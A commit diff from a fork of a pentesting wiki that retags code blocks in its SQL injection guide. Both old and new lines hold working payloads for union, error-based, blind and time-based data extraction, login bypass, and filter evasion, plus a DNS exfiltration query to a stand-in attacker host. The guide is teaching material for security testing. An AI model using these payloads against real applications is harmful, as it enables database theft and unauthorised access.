coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 491 pages modified

Browse Source
This commit is contained in:
CPol 2021-06-26 16:09:18 +00:00 committed by gitbook-bot
parent cd106b9c33
commit 4f109e4e87
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 26 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
pentesting-web/sql-injection/README.md
View File

@ -154,7 +154,7 @@ Two methods are typically used for this purpose:
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```text
```sql
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
@ -162,7 +162,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
#-1' UNION SELECT 1,2,3--+ True
```
```text
```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
@ -174,7 +174,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
Select more and more null values until the query is correct:
```text
```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
@ -186,7 +186,7 @@ _You should use `null`values as in some cases the type of the columns of both si
On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:
```text
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@ -204,7 +204,7 @@ _There is a different way to discover this data on every different database, but
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
```text
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
@ -213,7 +213,7 @@ Following a similar flow as in the Union Based exploitation you could manage to
In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.
In this case, you can abuse that behaviour to dump the database char by char:
```text
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```
@ -221,7 +221,7 @@ In this case, you can abuse that behaviour to dump the database char by char:
This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not \(maybe because the HTTP server crashes\). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
```text
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```
@ -229,7 +229,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
```text
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```
@ -243,7 +243,7 @@ You can use stacked queries to **execute multiple queries in succession**. Note
If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
```text
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
@ -270,13 +270,13 @@ List to try to bypass the login functionality:
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```text
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```text
```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
```
@ -284,7 +284,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
### Hash Authentication Bypass
```text
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
@ -299,7 +299,7 @@ You should use as username each line of the list and as password always: _**Pass
IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 \(_╘'_\)
```text
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
@ -318,7 +318,7 @@ print r.text
### Polyglot injection \(multicontext\)
```text
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
@ -344,7 +344,7 @@ More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideu
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
```text
```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
@ -384,24 +384,24 @@ With this technique you can extract information creating only 1 account. It is i
Using **hex2dec** and **substr**:
```text
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
To get the text you can use:
```text
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```
Using **hex** and **replace** \(and **substr**\):
```text
```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
Full ascii uppercase and lowercase replace:
#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
@ -411,8 +411,8 @@ Routed SQL injection is a situation where the injectable query is not the one wh
Example:
```text
Hex of: -1' union select login,password from users-- a
```sql
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
@ -420,7 +420,7 @@ Hex of: -1' union select login,password from users-- a
No Space \(%20\) - bypass using whitespace alternatives
```text
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
@ -431,13 +431,13 @@ No Space \(%20\) - bypass using whitespace alternatives
No Whitespace - bypass using comments
```text
```sql
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```text
```sql
?id=(1)and(1)=(1)--
```
@ -451,7 +451,7 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
Blacklist using keywords - bypass using uppercase/lowercase
```text
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
@ -471,7 +471,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}
## Other GUIDES
## Other Guides
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)